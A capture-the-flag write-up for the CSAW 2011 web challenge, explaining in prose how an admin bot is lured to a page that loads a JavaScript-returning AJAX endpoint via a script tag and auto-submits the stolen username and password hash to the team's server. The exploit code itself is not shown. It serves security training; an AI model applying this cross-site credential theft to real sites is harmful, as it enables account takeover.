CSAW 2011 CrackJack Web6 Write-up

In this challenge, we need to get administrator credential on someone’s site who loves cat, ajax and getting contact emails.

A robot will visit any link you post in the contact form, this robot is at the same time logged in the site’s administrator account.

The key vulnerability in this application is that the AJAX calls aren’t returning JSON.. they are returning Javascript expressions. This make it much easier to exploit because we don’t need to do any cross-domain calls.

One particularly interesting page is the self.php page that give to the connected user some informations about his account: username and password

The content of this page is built using … AJAX calls that fetch Javascript expressions containing an array with the username and password. You see were we are going.

One hint given by the CTF team is that the internal IP of the web server as seen from the administration’s point of view is 192.168.4.4

So normaly, the url is http://csawctf.poly.edu:40004/challenge2/json/getcurrent.js

From the administrator’s point of view, it will be http://192.168.4.4/challenge2/json/getcurrent.js

So we need:

• a way to fetch the javascript from this url
• send it back to a server we control

We did something very simple following a bright idea of our team-mate fser: using a script tag to fetch the remote Javascript expression. Then we use some javascript to update a form’s hidden fields with the username and password and we submit the form to our remote server. That’s it.

Code for the page the robot (administrator of the site) will visit:

Code for the data stealer targeted by our auto-submitted form: (nothing special)

When the robot hit our page, we get the result in our log file:

a:0:{}
a:2:{s:8:”username”;s:13:”administrator”;s:8:”password”;s:40:”2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8″;}

Now we log on the website with this username and password and we get the key on the frontpage. We are done.